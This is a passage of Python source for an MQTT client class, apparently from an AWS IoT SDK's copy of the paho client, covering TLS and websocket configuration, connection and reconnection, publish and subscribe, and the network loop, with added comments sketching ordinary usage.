self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._socket_factory = None
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = ProgressiveBackOffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
self._alpn_protocols = None
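# Illustrative sketch (not part of the implementation): constructing a client and
# wiring up a connect callback. The module path and class name below are assumed
# from the docstrings above (paho.mqtt.client style); adjust them to match how
# this class is actually exposed in your project.
#
#   import paho.mqtt.client as mqtt  # assumed import path
#
#   def on_connect(client, userdata, flags, rc):
#       # rc == 0 means the broker accepted the connection (see the rc table above).
#       print("connected, session present:", flags['session present'], "rc:", rc)
#
#   client = mqtt.Client(client_id="example-client", clean_session=True)
#   client.on_connect = on_connect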
def __del__(self):
pass
def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
Make custom settings for backoff timing for reconnect logic
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
srcMinimumConnectTimeSecond - The minimum time in seconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
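# Illustrative sketch: tuning the reconnect backoff. The values are arbitrary
# examples; configTime() raises ValueError if the parameters are malformed.
#
#   client.setBackoffTiming(srcBaseReconnectTimeSecond=1,
#                           srcMaximumReconnectTimeSecond=32,
#                           srcMinimumConnectTimeSecond=20)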
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
Make custom settings for IAM credentials for websocket connection
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def config_alpn_protocols(self, alpn_protocols):
"""
Make custom settings for ALPN protocols
:param alpn_protocols: Array of strings that specifies the alpn protocols to be used
:return: None
"""
self._alpn_protocols = alpn_protocols
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files is encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
if sys.version < '2.7':
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
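# Illustrative sketch: enabling TLS before connecting. The certificate paths and
# broker host are placeholders. As documented above, tls_set() must be called
# before connect()/connect_async(), and MQTT over TLS usually uses port 8883.
#
#   client.tls_set(ca_certs="root-ca.pem",
#                  certfile="client.pem.crt",
#                  keyfile="client.pem.key")
#   client.connect("broker.example.com", port=8883, keepalive=60)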
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
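# Illustrative sketch: the simplest blocking usage. connect() establishes the
# connection and loop_forever() then drives the network loop, handling
# reconnects. The broker host is a placeholder.
#
#   client.connect("broker.example.com", port=1883, keepalive=60)
#   client.loop_forever()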
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide a very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if self._socket_factory:
sock = self._socket_factory()
elif (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
verify_hostname = self._tls_insecure is False # Decide whether we need to verify hostname
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
self._ssl = SecuredWebSocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig) # Override the _ssl socket
# self._ssl.enableDebug()
elif self._alpn_protocols is not None:
# SSLContext is required to enable ALPN support
# Assuming Python 2.7.10+/3.5+ till the end of this elif branch
ssl_context = SSLContextBuilder()\
.with_ca_certs(self._tls_ca_certs)\
.with_cert_key_pair(self._tls_certfile, self._tls_keyfile)\
.with_cert_reqs(self._tls_cert_reqs)\
.with_check_hostname(True)\
.with_ciphers(self._tls_ciphers)\
.with_alpn_protocols(self._alpn_protocols)\
.build()
self._ssl = ssl_context.wrap_socket(sock, server_hostname=self._host, do_handshake_on_connect=False)
verify_hostname = False # Since check_hostname in SSLContext is already set to True, no need to verify it again
self._ssl.do_handshake()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if verify_hostname:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 5): # No IP host match before 3.5.x
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
if self._ssl and not self._useSecuredWebsocket:
self._ssl.setblocking(0) # For X.509 cert mutual auth.
elif not self._ssl:
self._sock.setblocking(0) # For plain socket
else:
pass # For MQTT over WebSocket
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
immediately when their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
# Socket isn't the correct type; in all likelihood the connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be sent after a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
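# Illustrative sketch: publishing and tracking delivery through the mid. As the
# docstring notes, a successful return only means the message was queued;
# on_publish fires once transmission to the broker has completed.
#
#   def on_publish(client, userdata, mid):
#       print("message", mid, "handed off to the broker")
#
#   client.on_publish = on_publish
#   result, mid = client.publish("sensors/temperature", payload="21.5", qos=1)
#   if result == MQTT_ERR_SUCCESS:  # module-level constant used throughout this file
#       print("queued publish with mid", mid)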
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. It need not have any relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
"""
self._username = username.encode('utf-8')
self._password = password
def socket_factory_set(self, socket_factory):
"""Set a socket factory to custom configure a different socket type for
mqtt connection.
Must be called before connect() to have any effect.
socket_factory: create_connection function which creates a socket to user's specification
"""
self._socket_factory = socket_factory
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
self._backoffCore.stopStableConnectionTimer()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
---------------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIBE
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
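# Illustrative sketch: the three accepted subscribe() call forms described in the
# docstring above. Topic names are placeholders.
#
#   client.subscribe("my/topic", qos=1)                        # string and integer
#   client.subscribe(("my/topic", 1))                          # (topic, qos) tuple
#   client.subscribe([("my/topic", 0), ("another/topic", 2)])  # list of tuples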
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
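# Illustrative sketch: driving the client from an external select() loop instead
# of loop()/loop_start(), using socket(), want_write(), loop_read(), loop_write()
# and loop_misc() as described above. This is a minimal pattern, not a complete
# event loop.
#
#   import select
#   while True:
#       rlist = [client.socket()]
#       wlist = [client.socket()] if client.want_write() else []
#       readable, writable, _ = select.select(rlist, wlist, [], 1.0)
#       if readable:
#           client.loop_read()
#       if writable:
#           client.loop_write()
#       client.loop_misc()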
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
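# Illustrative sketch: registering a last-will message before connecting, so the
# broker publishes it if this client disconnects unexpectedly. Topic, payload and
# host are placeholders.
#
#   client.will_set("clients/example-client/status", payload="offline", qos=1, retain=True)
#   client.connect("broker.example.com", 1883, 60)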
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
except socket.error as err:
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
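# Illustrative sketch: the threaded interface. loop_start() spawns the network
# thread and loop_stop() joins it. The broker host is a placeholder.
#
#   client.connect("broker.example.com", 1883, 60)
#   client.loop_start()
#   try:
#       client.publish("status", "running", qos=0)
#   finally:
#       client.disconnect()
#       client.loop_stop()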
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
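# Illustrative sketch: routing one topic filter to a dedicated handler while all
# other messages fall through to the default on_message callback. The topic
# filters are placeholders.
#
#   def on_temperature(client, userdata, message):
#       print(message.topic, message.payload)
#
#   client.message_callback_add("sensors/+/temperature", on_temperature)
#   client.subscribe("sensors/#", qos=1)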
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
# This gets called if select() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
